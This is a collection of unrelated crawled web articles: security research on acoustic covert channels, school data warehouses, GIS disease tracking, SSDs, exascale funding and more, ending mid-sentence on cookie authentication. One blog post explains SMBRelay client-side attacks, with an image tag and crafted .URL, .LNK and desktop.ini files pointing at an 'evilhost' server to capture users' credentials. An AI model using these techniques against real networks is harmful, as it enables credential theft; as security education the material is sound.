<urn:uuid:99c0e128-f407-49d8-91e7-da7a5ffbaa7d>
CC-MAIN-2017-04
http://www.aiotestking.com/cisco/what-are-the-two-most-likely-driving-forces-motivating-businesses-to-integrate-voice-and-data-into-converged-networks/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00176-ip-10-171-10-70.ec2.internal.warc.gz
en
0.901155
301
2.84375
3
Physically isolating critical systems from networks and systems that are unsecured has long been used as a simple way to protect the former from unwanted intrusions and malware. But, with the advent of Stuxnet, the “air gap” measure has proven to be inadequate when motivated attackers are involved. Quite recently, security researcher Dragos Raiu has unnerved and intrigued the security community with claims that he has been analyzing a piece of malware that “jumps” from one computer to another in its proximity, without the two being connected in any way to each other, to a network, or the Internet. He posited – but hasn’t yet conclusively proven – that this “badBIOS” reaches across air gaps by taking advantage of computers’ speakers and microphones, and the high-frequency transmissions that can be passed between them. A few weeks later, a new issue of the Journal of Communications was released, and in it a paper written by two German researchers who have managed to create a malware prototype that uses a “covert channel of communication”, i.e. the very speakers and microphones that Raiu believes crucial to badBIOS’ dissemination. They tick the four boxes that the researchers consider crucial to “covert” communication: they are usable as either a sending or a receiving device, are accessible to the sending or receiving process, are not yet established as a communication device (i.e. not subject to the system and network policies), and are able to support stealthy communication (and thusly prevent immediate detection). “With a covert acoustical mesh network, we can offer a whole range of covert services to the participating computing systems, including internet access via an IP proxy,” they explained. “In the considered scenario, we are able to show that even high-assurance computing systems can be exploited to participate in a covert acoustical mesh network and secretly leak critical data to the outside world.” They did so by implementing an adaption of an emulation system for underwater acoustical networks from the Research Department for Underwater Acoustics and Marine Geophysics in Germany, by using two laptops, and a series of devices they “chained” together to transport the signal over a greater distance. The only problem is that this channel has a very limited transmission rate, which makes it only good for relaying small-sized files – containing, for example, keystroke data or similar sensitive information – to the attacker’s computer nearby or via a local proxy server to a remote email server located anywhere in the world. The researchers – Michael Hanspach and Michael Goetz of the Fraunhofer Institute for Communication, Information Processing, and Ergonomics – have also come up with countermeasures against this type of information leak, but to know more about it all (and in greater detail), I advise reading their paper.
<urn:uuid:17cbd7f5-9550-4ee6-b591-b96db22fea18>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2013/12/03/researchers-prove-malware-can-communicate-via-computer-speakers-and-microphones/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280065.57/warc/CC-MAIN-20170116095120-00084-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952343
609
3.015625
3
One of the education world's newest trends is using technology to help schools function with the sort of efficiencies normally found in the business world. Enterprise Resource Planning (ERP) packages were among the first tools to move from the business world to the education world. ERP systems, with their combination of financial, human-resources and procurement functions, are now being used by many educational institutions to streamline complex administrative functions. Schools are also looking to technology as a means of measuring accountability. The Ohio Department of Education (ODE) is one of the pioneers in this area. In 1998, the Ohio Legislature enacted SB 55 to improve school accountability. Specifically, SB 55 required the ODE to generate "report cards" measuring district and building-level performance in 18 different areas for all 611 school districts in the state. In doing so, the department and state lawmakers hoped to more easily compare and contrast schools with state performance standards and to identify which institutions were excelling and which were falling behind. The assignment was a difficult one, admitted the department's chief information officer, Rob Luikart. "The report cards required us to collect data from schools and from proficiency-testing companies. But even after all the data was collected, giving it meaning within the confines of a paper report was not easy. You could see the data, but making sense of it and giving it real value was going to require a lot more." When Luikart began working for the department earlier in 1998, the organization stressed to him its goal of developing a technology plan and data architecture. Luikart, therefore, decided that a technical approach to the report-card dilemma might be the perfect solution. "Like many Fortune 500 companies, much of our financial and management information was locked up in legacy systems that didn't talk to one another," he said. "We needed to take a more enterprise view of that information, so we undertook a project to build a data warehouse. That was sort of a watershed event for the agency." The first function of the new data warehouse was to compile the ODE's school-report-card information. Not only would the system efficiently compile all the components from the districts, it would also allow the department to build an interactive version of the report card to be placed on the Internet. "We wanted to create an e-government environment, meaning we could make this information -- which is important to constituents, the public, legislators, school boards, administrators, parents, teachers and sometimes even kids -- easily accessible to all of them. We also wanted to add value to it," Luikart said. Putting it in Place Once the department decided what it wanted, it went looking for strategic partners and best-of-breed practices in warehouse design and implementation. The ODE utilized the expertise of several consulting groups, chose partners and began building the system. Today, the department's report cards are compiled electronically and available to anyone at its Web site . There, visitors can view a report card from any Ohio school, examine proficiency-test information, attendance and enrollment data, student achievement statistics, teacher qualifications, graduation rates or annual spending per pupil. They can also instruct the system to compile sophisticated reports. "It allows people to look at trend information. It reveals trends on a given district's three-year performance and shows how well it performed in comparison to similar districts and the overall state average," said Luikart. "It provides data that wouldn't be easy to display on the paper report card because it would take up too much space. Things you can't do with paper can be done easily on the Web, using decision-support software and other tools." According to Luikart, access to student data at the individual school level allows everyone involved in education to make better decisions for Ohio's students. From the legislative point of view, the department's Web site will improve accountability by showing the state what it's getting -- or not getting -- for its investment. "We'll be able to see what methods of teaching and curriculum are most effective, if programs are having an impact, etc. That's data that wouldn't be easily understood, or even available, prior to the report cards." Meanwhile, school administrators will use the system to formulate long-term strategies and spot downward trends before they become serious problems. If one school in the state performs excellently, other schools can easily emulate the methods. Parents can use the system to choose the best school for their children. If a school is performing poorly, communities can organize to make changes. "Few factors have greater impact on student performance than parent and community involvement," said Luikart. "For this reason, providing information to parents and community members in an interactive environment is important. We want them to understand what questions to ask of teachers, administrators and students; to look for areas of strength and weakness and to understand them so they can make informed decisions. Ohio is a local-control state, so there is a great emphasis on local decision-making. Having the information on the Web gives people a basis on which to ask those kinds of questions." Rob Silverman of MicroStrategy Inc., one of the ODE's partners, said the ODE is one of the few organizations to realize that providing interactive information over the Web can help build a bond with constituents and deliver better service. "This is an organization that's using technology in a way that really adds value to the public," Silverman said. "It is one of the pioneers in doing so." With their interactive report cards in place, the department is already looking to take the data warehouse to the next level. Plans include making financial and program information available electronically. "It will be interesting to see how providing this kind of information and this kind of tool unfolds and how it might influence activities in the future," said Luikart. "This is just the beginning of a trend in government and education of moving information into a forum where the public can actually use it." Justine Kavanaugh-Brown is editor in chief of California Computer News, a Government Technology sister publication. E-mail
<urn:uuid:da206fca-ddf8-45f3-b408-233d50621bc4>
CC-MAIN-2017-04
http://www.govtech.com/magazines/gt/An-ODE-to-Accountability.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00202-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962813
1,247
2.71875
3
Mosquitoes are among nature's least loved winged insects. But, when they went from being mere pests to carriers of the West Nile Virus, they became a serious health threat. Today, the Commonwealth of Pennsylvania is putting its experience with battling virus-carrying mosquitoes to good use in fighting an even greater threat to the nation's health - biological and chemical terrorism. When the West Nile Virus, carried by mosquitoes, threatened to migrate from New York to Pennsylvania several years ago, the commonwealth responded by creating a GIS-based system that plots and tracks the location where virus-infected animals have been found. The events of 9-11 spawned the Pennsylvania Incident Response System (PAIRS), an application modeled after the West Nile Virus system that is designed to track bio-terrorism threats, assess potential incidents and analyze suspected biological agents. GIS forms the cross-agency platform that is key to the effectiveness of both the West Nile Virus Tracking system and PAIRS, according to Eric Conrad, a 25-year veteran of state service. Conrad, deputy secretary for field operations at Pennsylvania's Department of Environmental Protection (DEP), is a long-time champion of GIS mapping to streamline government processes. In 2001, as the West Nile Virus proliferated, the commonwealth found itself poorly positioned to respond. Conrad, a strong proponent of the "picture is worth a thousand words" theory, was confident that GIS mapping would be an essential tool in meeting the new threat. Starting with no infrastructure, staffing or experience in tracking vector-born diseases, the DEP created a multi-agency system based on shared information and systems. "We kept three cabinet secretaries on message for three years, and the public benefited because everyone was working together," Conrad said. "The message was consistent about what the state was doing to protect them. We even had environmental groups on our side. It suddenly became a role model for good government." The know-how gained from that experience now is being used to strengthen homeland defense. "We are building the incidence response system," he said. "All the technology and pieces that are being rolled into this new system have already been proven." Thanks to some forethought, flexibility had been part of the original model. "What happened was that when we built the tracking system, I said we can't build it just for one disease," Conrad said. "It has to have an open architecture." The core of the West Nile Virus system is a relational database shared by four Pennsylvania agencies - DEP, the Health Department, Department of Agriculture, and the Department of Conservation and Natural Resources. Field agents use handheld computers to gather incident information as they collect samples. That information is then fed into the database. "If you get the people doing the field work putting [information] in the database, you get fewer errors," Conrad said. "We thought about how we could minimize the amount of data entry and that's where the handhelds came in. Our aim was to keep it as simple as possible." Field agents carry HP iPAQ units, but Conrad said any Windows CE-based device could be used. The system, based on ESRI's ArcPad GIS software, immediately captures longitude and latitude for collected samples; it also records the time of collection and offers customizable screens for additional field-collection data. When field agents return to the office, their mobile devices are synced to laptops and data is downloaded to the enterprise GIS database using ESRI's ArcSDE software. ArcSDE is the GIS gateway that facilitates managing spatial data within the database management system. The entire process was designed with field staff in mind. "They are more scientists than IT people," Conrad said, adding that simplicity of use was a core requirement for the system. Along with the four partner agencies, three state laboratories, 67 county
<urn:uuid:75a494a3-8450-46fa-bec0-eefc4a84e299>
CC-MAIN-2017-04
http://www.govtech.com/e-government/Bitten-by-the-GIS-Bug.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00506-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962388
791
3.03125
3
Stanford University will receive $16 million over the next five years from the National Nuclear Security Administration (NNSA) to use supercomputers to find ways to increase the efficiency of solar energy concentrators. The research project involves developing new models that will help solve vexing engineering challenges on the next generation of exascale supercomputers. The crux of the research will focus on modeling complex physical and chemical interactions that take place in solar-thermal systems, which use mirrors to concentrate sunlight into a fluid that powers a turbine. Key variables that impact the efficiency of such industrial-scale solar systems include the alignment of the mirrors and the size of fine particles that are suspended in the fluid to serve as energy conduits. The research at Stanford will focus on better understanding and modeling these variables, according to Gianluca Iaccarino, an associate professor of Mechanical Engineering and the leader of the new research project at Stanford. “We need to rigorously assess the impacts of these sensitivities to be able to compute the efficiency of a system like this,” Iaccarino said in a news story that appeared on the Stanford website. “There is currently no supercomputer in the world that can do this, and no physical model.” Thus, the need for an exascale supercomputer, which is the second part of the NNSA’s directive. The NNSA and the Department of Energy have set an ambitious goal to develop an exascale supercomputer by 2018. Meeting that deadline is a major challenge in its own right. “The supercomputer paradigm has reached a physical apex,” Iaccarino said in the Stanford story. “Energy consumption is too high, the computers get too hot, and it’s too expensive to compute with millions of commodity computers bundled together. Next generation supercomputers will have completely different architectures.” The researchers will need to get creative and be flexible in their models, which will need to adapt to whatever architecture emerges in the exascale period. This basically amounts to “programming blind,” the Stanford story says. The research at Stanford will involve several of the university’s departments, including the Mechanical Engineering, Aeronautics and Astronautics, Computer Science, and Math departments. Stanford has a long history of multi-disciplinary research work in HPC, including a collaboration that started 15 years ago between the Computer Science Department and the Mechanical Engineering Department to solve physics problems on massively parallel computers. In addition to the computer work, Stanford will operate a physical experiment of the solar collector. The university will work with five other universities on the project, including the University of Michigan, the University of Minnesota, the University of Colorado-Boulder, the University of Texas-Austin, and the State University of New York-Stony Brook. Stanford, which was one of three universities selected by the NNSA for the project, will receive $3.2 million per year for the next five years. Other universities selected to house research centers under the NNSA’s Predictive Science Academic Alliance Program II (PSAAP II) include the University of Utah and the University of Illinois-Urbana-Champaign.
<urn:uuid:dc9e01b4-7ba6-4380-9396-538bc37b05e8>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/08/02/stanford_gets_federal_funding_to_bring_solar_research_to_exascale_levels/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00046-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931226
665
2.890625
3
Article by Alexey Tuyrin from DSecRG Today we will talk about client-side attacks. An attack of a network is a progressive action. Usually, we escalate our rights step-by-step from nothing to a domain administrator. Even casual un-privileged users can give us something interesting, for example access to some shared resources. But how can we get these user rights? We can enforce users to authenticate on a controlled machine. There are alt least three main ways to interact with user. They are very abstract. 1) HTML and browser We can use a social engineering or a MitM attack like dns-poisoning to bring users to our web site with a following code:< i m g s r c= ” \ \ e v i l h o s t \ t e s t ” > Their browsers will try to take the image from our server and give us their credentials. At the same time users will not know about such actions. 2) Crafted document We can create special document (like MS Excel file) and send it to users via e-mail or put it on shared resources. When a user opens it, office program tries to connect our server and give us user's credential. We will talk about it in the next blog post. 3) Windows Explorer and shared resources If we have permission to write to some shared resources (for example file server or or directory on terminal server), we can create a specified file. When somebody browses to a folder with the file, Explorer will try to connect to our server without any interaction from a user. Such a "specified file" can be: - .LNK - Windows Shortcut File. There is ability for setting an icon to file. We can set path of it to our server and Explorer will try to download it. - .URL - Internet Location File. Like LNK-file - setting an icon to a file, but URL is a primitive text file. So we write a following text and save it with URL extension: The file is used for folder's customization. There is some different fields (InfoTip, desktop.ini, LocalizedResourceName, IconFile (IconResource for Vista/7)) which can give us necessary links to our server. Fields' influences on Explorer are different (you can read about it here http://www.tarasco.org/security/payload/index.html). A little limitation is a folder with desktop.ini, which should be ‘system'. It can be set by ‘attrib +s folder_name'. But there are some pluses: desktop.ini are ‘hidden' by default, and folders like "My Documents", "Disc C(D, E,..)", "Desktop" are ‘system' by default. Simple example of desktop.ini: Cross-posted from Digital Security Research Group
<urn:uuid:006f79b5-c297-453a-adb0-f3f68748fdc1>
CC-MAIN-2017-04
http://www.infosecisland.com/blogview/12805-SMBRelay-Attacks-on-Corporate-Users.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00166-ip-10-171-10-70.ec2.internal.warc.gz
en
0.840219
609
3.140625
3
For many people, passwords are the bane of online existence. Rely on one master password for all your logins and using the Internet can become a security threat. Use dozens of unique ones and it quickly becomes an annoyance. With Windows 10, Microsoft looks to resolve this problem for good. And by doing so, they hope to make the Internet and computer devices both safer and easier to use, for people around the world. Here’s how they intend to do it. The problem with passwords is simple – they can be stolen. And from Facebook to iTunes to Flickr and thousands more, nearly every major website and thousands of niche ones require a password to use. And because we Internet users are logging onto dozens of these sites and services everyday, it’s virtually impossible for us to create a unique, complex password for each one. So people resort to using only a handful of passwords, or even just one master password, since it’s easier. But of course, this poses a security risk. So what’s an Internet user to do? Microsoft Windows 10 is pioneering a new technology that is ready to flip this dated system on its head and eliminate the password problem for good. Passwords can be stolen easily, but how easy is it to steal a person’s physicality? Microsoft’s new technology, named Hello, uses biometrics – such as your fingerprint, or face or iris scan – to log into your computer, laptop or other device. This ensures that no one can login to your device but you. Well, what about using a photograph to login instead, you might ask? It won’t work. Using technology that takes a detailed map of your face in 3D, Hello is trained to reject the token photograph or selfie on login attempt. This makes it virtually impossible for anyone, besides you, to login to your device. Logging into your computer with biometrics is great, but what most users really want is a more secure solution to login to websites while not having to remember a bazillion passwords. This is where Microsoft’s Passport comes in. Passport allows you to login into applications and online content without the need for a password. For example, instead of using your typical password to sign into your Microsoft Windows Account, you can now use Windows 10 facial recognition (or other biometrics) to log you in instead. That means you can access Skype, Xbox Live, Office 365 and more without a standard password. In addition to your Microsoft Windows Account, you’ll be able to use the biometric capabilities of Passport to access thousands of enterprise Azure Active Directory online services. Bear in mind, though, that it will be quite some time before you can use Passport to replace all your standard logins, since not every website has implemented this technology yet. Want to hear more exciting Windows 10 news, or need assistance with your Windows device? Get in touch with one of our technology experts today.
<urn:uuid:746a82d9-b5f9-474b-b62a-423aca558f89>
CC-MAIN-2017-04
https://www.apex.com/windows-10-says-adios-passwords/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00286-ip-10-171-10-70.ec2.internal.warc.gz
en
0.917479
613
2.765625
3
Harnessing energy from renewable sources for self-sufficient electricity communities. This paper introduces the concept of Cloud Power: a community striving for electricity self-sufficiency based on energy from renewable sources. The concept is currently under development at Capgemini in cooperation with TexelEnergie in the Netherlands. Cloud Power provides the advantages usually associated with smart grids, but starts from the consumer’s point of view. The highly political nature of energy use has brought it into the public consciousness. Increasingly, people want to take control of their energy consumption, and in some cases are willing to pay a higher price if this reduces their environmental impact. Some consumers are willing to accept a reduction or interruption of supply given a fair remuneration. Still others think they are well-equipped to manage the risk of price volatility themselves. This is where Cloud Power comes in. Cloud Power aims to unite a relatively small group of consumers with a common approach to their energy supply, and enable them to define and jointly pursue their individual goals. This Cloud Power ‘community’ is opt-in, and revolves around common objectives that define the identity of that community. A typical Cloud Power community can be economically feasible for several hundred participants, and these participants don’t need to live near each other. Although the economies of scale provided by traditional energy companies are not available, by using technology and participants in an intelligent, responsive way, Cloud Power can be a democratic, competitive way of providing energy to consumers.
<urn:uuid:975e4c6c-6290-4698-aaf8-5adc7227700f>
CC-MAIN-2017-04
https://www.at.capgemini.com/cloud-power
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00404-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949565
306
2.65625
3
The Impact of Insider Threats – The South Korea Episode. In Layman’s Terms, What Happened? At the center of the story is an employee who was working as a software engineer for three credit card companies. Over the course of a year and a half, this employee copied data from corporate servers to his personal drive. What makes this story particularly interesting is that the software engineer was writing anti-fraud software for the firms that he worked for during the same time that he was stealing data. Business Impact? You Bet! According to Bloomberg, 27 executives resigned following this incident, including bank CEOs and other senior management. Over half a million credit card users have already asked for new credit cards with many more to come. Perhaps the most significant impact is on the brand of the affected companies. Some companies never recover from the brand damage caused by such a massive security breach. There are opportunities to prevent these sort of breaches. Audit and a properly deployed behavior alerting system could and should have flagged abnormal behavior from a user with privileged access. In this case, a software engineer who needed access to perform his job was copying massive amounts of data over time. From a security standpoint, a simple “rule” that alerts IT when a user accesses massive amounts of sensitive data over time would have caught him in his tracks. Authors & Topics:
<urn:uuid:2595c5b9-f92d-4eeb-9976-014a0049b78f>
CC-MAIN-2017-04
http://blog.imperva.com/2014/01/the-impact-of-insider-threats-the-south-korea-episode.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00312-ip-10-171-10-70.ec2.internal.warc.gz
en
0.980238
280
2.5625
3
Part One: Solid state disk technology explained. The reliablity of solid state disks has improved markedly in recent years. Flash memory has, in the past, had a frustratingly finite lifecycle, as each cell can only be written to so many times before the semiconductors lose the physical properties that make it possible for them to store data. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. Improvements to the technology are extending the devices’ working lives to levels that compare comfortably with other types of drive. “The thing we do on the SSDs is spread the writes across the disk,” says Intel’s Casey. Modern SSDs also feature a technology called “wear levelling” that ensures the same cells are not written to all the time. “We are starting to see 2million hours mean time between failure,” Casey says. “We guarantee a million cycles of the cell – but a drive could produce five million. That translates into - 350GB/day for five years for enterprise class SSDs and 20GB/day for five years in drives for consumers.” SSDs’ most visible role to date has been in laptop computers like the Macbook Air and some Lenovo, ASUS and Toshiba models. Used in this way, SSDs lower laptops’ weight and boost their battery life, two desirable outcomes. SSDs are expected to become standard issue on laptops as soon as pricing permits. In the enterprise, SSDs are expected to speed applications by taking on the role currently performed by fiber channel drives in enterprise arrays. “The problem with physical disks is that the head has to fly over the platter, find the data, then read it off,” says EMC Australia’s Clive Gold. SSDs do not have that physical chore to achieve and therefore deliver data to their I/O bus more quickly than even the fastest conventional drives. “SATA I/O is a third the speed of fiber channel,” Gold says. “Flash is thirty times as fast as fiber channel.” SSDs will therefore, he believes, become the natural home for data that businesses know must be accessed quickly. The overwhelming majority of data will be stored on conventional disk, which will remain a viable technology for data like video that does not ask a hard disk to do a lot of physical work. But the data that applications request most often, and to which users are most sensitive to response times, will be placed on a tier of SSD that sits in the same array as conventional disk to ensure that applications can retrieve it and present it to users (or to other computing devices) at pleasing speed. Body: Bringing this scenario to reality is not, however, as simple as connecting SSDs to an enterprise array and sitting back to enjoy the speed boost. Vendors of enterprise arrays carefully vet the drives they say will work in their machines, as different SSD manufacturers have different ways of processing I/O. Sun Microsystems Asia Pacific CTO Angus MacDonald believes SSDs have another role: replacing direct-attach storage in servers, to much the same end as the scenario that sees SSDs placed in storage arrays But in either scenario, SSDs are likely to strains arrays, servers and networks. “SSD is so fast, it keeps responding and hogs resources. This creates a challenge for the way things like caching get done,” says EMC’s Gold. “You can only get eight to ten SSDs into a chassis before you saturate the cache,” adds Sun’s MacDonald. Gold believes that EMC has applied its experience building large arrays to the problem of coping with SSDs’ massive output and that its quality of service and other controls make SSDs usable today. Sun’s MacDonald says the company has similar tools in the short-term pipeline, but is also working to help would-be SSD users manage the challenge of automatically figuring out which data belongs on the new, fast, SSD tier. MacDonald says his company is working to making this classification a function of it ZFS file system. “A definite direction for ZFS is getting an inherent understanding of what tier data belongs on,” he says. Other vendors are taking similar steps to make sure that SSDs can deliver for the enterprise. And EMC’s Gold believes that soon, those technologies will be pressed into service in the mainstream. “We have two or three years until fiber channel becomes obsolete,” he says.
<urn:uuid:1d2e004d-6fe1-4166-b491-6dd3986a0517>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240018928/Is-solid-state-disk-reliable
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00552-ip-10-171-10-70.ec2.internal.warc.gz
en
0.95376
960
2.90625
3
A new programming standard, called the Open Spatial Programming Language (or OpenSPL), debuted today “to enable the next generation of high performance parallel spatial computers.” The open standard was developed by the Open Spatial Programming Language (OpenSPL) consortium, which formed to promote the use of spatial computing among a wide set of users and to standardize the OpenSPL language. The overarching goal of the consortium is for spatial computing to become the industry standard for mission critical computations. The entire effort hinges on the well-supported idea that the future of computing is parallel. OpenSPL is based on the concept that a program executes in space, rather than in time sequence. It takes the current paradigm and turns it on its head. Operations are assumed to be parallel unless specified as sequential. The consortium explains that this is similar to a factory floor where all operations take place in parallel, with each operation carrying out a piece of the overall process. “Temporal Programming is a recipe for the execution of actions, whereas Spatial Programming builds a factory to execute the recipe,” is how the backers put it. “Conventional programs execute in 1 dimension, where time progresses forward following the instruction sequence. Spatial programming is programming in 2 dimensions, where data progresses forward in parallel across the fabric of an array or chip.” It’s a revolutionary view of computing with the potential of yielding significantly higher performance, compute density and energy-efficiency compared to traditional instruction-processor machines. With deterministic throughput and low latency at low power, spatial computing is well-matched to line-rate data processing applications, such as that used in high performance computing, datacenter networking and the Internet of Things. “OpenSPL enables us to build parallelized applications that fully take advantage of spatial computing technology with the ease of a high-level software project,” notes Ryan Eavy, executive director, Architecture, CME Group. A video on the consortium’s website explains the concept in greater detail. Spatial programming is also green, according to the OpenSPL consortium, since the amount of computation per cubic foot of datacenter space is maximized. The right applications can experience two orders of magnitude improvement in computational density, reducing power consumption accordingly, say backers. The OpenSPL consortium includes both industry and academic partners, and offers two levels of membership. Full members participate in all consortium activities, including voting, while observer members participate but may not vote. The consortium was founded by “full members” CME Group, Juniper, Chevron and Maxeler Technologies with Imperial College London, Stanford University, University of Tokyo and Tsinghua University contributing as “observer members.” The consortium is managed by a steering committee, currently chaired by Tamas Nemeth of Chevron. Activity is building for the effort. The first OpenSPL Summer School will take place July 2014, at Imperial College London. Researchers, students, and members of OpenSPL will gather together to share experiences, work on application development, and continue to advance the space computing paradigm.
<urn:uuid:19168790-1b3c-4564-a1b9-8c8cb47e4b68>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/12/10/consortium-advances-spatial-computing-standard/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284411.66/warc/CC-MAIN-20170116095124-00000-ip-10-171-10-70.ec2.internal.warc.gz
en
0.925804
639
3.046875
3
Brainerd, Minn., is looking into new energy sources to heat and cool homes and businesses. Partnering with Minnesota-based company Hidden Fuels, the city plans to harness the heat in its sewers, reported National Public Radio. Many types of man-made geothermal energy systems exist around the world. But using heat trapped in sewers, which can build up from dishwasher waste or hot showers, is less common. The system will use technology similar to geothermal heating and cooling systems, but could potentially be less expensive because sewer water is already in the right temperature range (between 42 and 66 degrees Fahrenheit) and much of the infrastructure is already in place. The challenges come from the mess. "We're not dealing with clean fluids," Hidden Fuels' Peter Nelson said, reported NPR. "We're dealing with contaminated fluids. And so that's really the challenge ... to be able to operate efficiently in that contaminated environment." Though the system is not yet in place, at one location Hidden Fuels found enough thermal energy to heat 229 homes, reported inhabitat.com. The city also plans to have a sewer-heated police station by the end of this year.
<urn:uuid:d670ed7e-e87d-414f-9aa8-4589bebcf0d2>
CC-MAIN-2017-04
http://www.govtech.com/technology/City-Sewer-Heat-Power-Homes.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00304-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958947
242
2.515625
3
Site home page Get alerts when Linktionary is updated Book updates and addendums Get info about the Encyclopedia of Networking and Telecommunicatons, 3rd edition (2001) Download the electronic version of the Encyclopedia of Networking, 2nd edition (1996). It's free! Contribute to this site Electronic licensing info Note: Many topics at this site are reduced versions of the text in "The Encyclopedia of Networking and Telecommunications." Search results will not be as extensive as a search of the book's CD-ROM. The application layer is the top layer of the OSI (Open Systems Interconnection) model. The OSI model guides software developers and hardware vendors in the design of network communications products. When two systems need to communicate, they must use the same network protocols. The OSI models divide protocols in seven layers, with the lowest layer defining the physical connection of equipment and electrical signaling. The highest layer defines how an application running on one system can communicate with an application on another system. Middle layers define protocols that set up communication sessions, keep sessions alive, provide reliable delivery, and perform error checking to ensure that information is transmitted correctly. See "OSI (Open Systems Interconnection) Model" for more information on the complete OSI stack. The application layer is the top layer in the OSI protocol stack. Applications that provide network features reside at this layer and access underlying communication protocols. Examples include file access and transfer over the network, resource sharing, and print services. The OSI model specifies that applications must provide their own layer 7 protocols. The OSI FTAM (File Transfer Access and Management) utility and the X.400 electronic mail standard provide services at the OSI application layer. In the Internet world, the application layer resides directly on top of the TCP/IP protocol stack. In this model, the presentation layer and session layer of the OSI protocol stack are used. The application layer talks directly with the transport layer (TCP and UDP). Common Internet applications in the application layer include Telnet, FTP (File Transfer Protocol), NFS (Network File System), SMTP (Simple Mail Transport Protocol), and DNS (Domain Name System). Copyright (c) 2001 Tom Sheldon and Big Sur Multimedia.
<urn:uuid:1cb18d56-2f62-47b0-af41-9debd8d07e43>
CC-MAIN-2017-04
http://www.linktionary.com/a/application_layer.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00021-ip-10-171-10-70.ec2.internal.warc.gz
en
0.809605
465
3.375
3
There will likely be an assortment of meshes The mesh as I see it (and as backed up by some of my smarter friends) is basically the notion that there exists a vast group of devices that are somehow connected, sharing information and applications. The information is stored in many places, synchronized and shared through the network. Processing occurs both locally and remotely or "in the cloud." The information can pass from device to device without passing back through the hub, or Web. And this is why it's called a mesh and not the standard hub-and-spoke system that most computing, including software-as-a-service, is built on today, said a friend of mine. Moreover, in a true mesh, data is just data, and processing occurs where it needs to occur, be it remotely, locally or both.As an example: The protocol from a user's iPhone to his PC is through iTunes-a proprietary protocol. And the applications are written to a proprietary API set and iTunes itself is a proprietary network. But the device can still send data that an application on the user's Windows Mobile device can work with, which will come through their Exchange/ActiveSync connection. As long as there are gateways, it doesn't matter. That is the device mesh at work. And while it is still very early days for this concept and pioneers are taking the lead, it is likely that a lot of fuss will be made over the proprietary nature of this or that network or device. As long as the protocols and file formats can be converted, that is about as relevant as what weight paper you type your resume on. Jeremy Burton, CEO of Serena Software, said the platform shift to SOAs (service-oriented architectures) and Web services "allows you to have a standard way to interoperate and also it allows the location of an application (or services) to be irrelevant-on-premise, in the cloud, who cares? I think Microsoft realizes that for it to own the new world, it has to be in control of the standards that link [or mesh] this new world together. If these standards are all open, and everyone can write to them, then that would be bad for Microsoft. ... They potentially could be marginalized and their services swapped out for something else." And while Ozzie speaks broadly of a device mesh in a Microsoft-sponsored world, there will likely be an assortment of meshes, both proprietary and "open," if you will.
<urn:uuid:dbce1736-197f-476f-8ff2-deacc61a0cd4>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Application-Development/Boy-What-a-Mesh/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00415-ip-10-171-10-70.ec2.internal.warc.gz
en
0.966655
501
2.765625
3
- By John De Santis CEO, TriCipher Throughout 2006, a series of high-profile incidents occurred that very painfully and very publicly highlighted how flimsy usernames and passwords are in protecting a person's online identity. Phishing and various other forms of online fraud sent the e-business community--particularly in financial services, which bore the brunt of these attacks--into a tailspin. In a bold move, one of the world's largest banks aggressively promoted its deployment of multi-factor authentication as a free, required service to all of its online banking customers.Subsequently, many banks have followed suit, adopting technology designed to verify that the bank's Website was really the bank's Website, and that users were who they said they were. Generally, the enrollment process required people to choose an image to use as a unique identifier, write a brief phrase and select three challenge questions. The Website then dropped a cookie on the user's machine that gets passed back and forth between the user's computer and the bank to confirm each other's identities. This process made customers feel safer, and demonstrated that banks were stepping up to the plate to protect their customers online. But where the cyber-rubber hits the road, they're relying on HTTP cookies for authentication--a method which is at best weak, and at worst, completely useless. As a quick refresher, the term "HTTP cookie" derives from "magic cookie," defined in Wikipedia as a packet of data a program receives but only uses for sending it again, unchanged. Already used in computing, magic cookies were "webified" by Netscape programmers while developing an e-commerce solution for one of Netscape's customers to implement a virtual shopping cart. From their inception, cookies have been fraught with both security and privacy issues. Cookies are easily hacked, often deleted by users (requiring frequent answering of security questions to view their accounts), and useless against Man-in-the-Middle (MITB) and Man-in-the-Browser (MITB) phishing attacks, which are occurring with increasing frequency. To be fair, cookies, passwords and images are more secure than passwords alone, but not by much. In a nutshell, they raise the bar from nothing to...almost nothing. As a consumer of online services, I can appreciate the initiative to ensure my safety without any major inconvenience--but if it's not buying me a safer experience, then what's the point? When the cookies crumbles, then what? The justification for using cookies for consumer authentication is that it's a step up from what's currently being used (usernames and passwords) and doesn't interfere with the online experience. It all boils down to the classic battle between security and convenience--more security means more complexity, and if 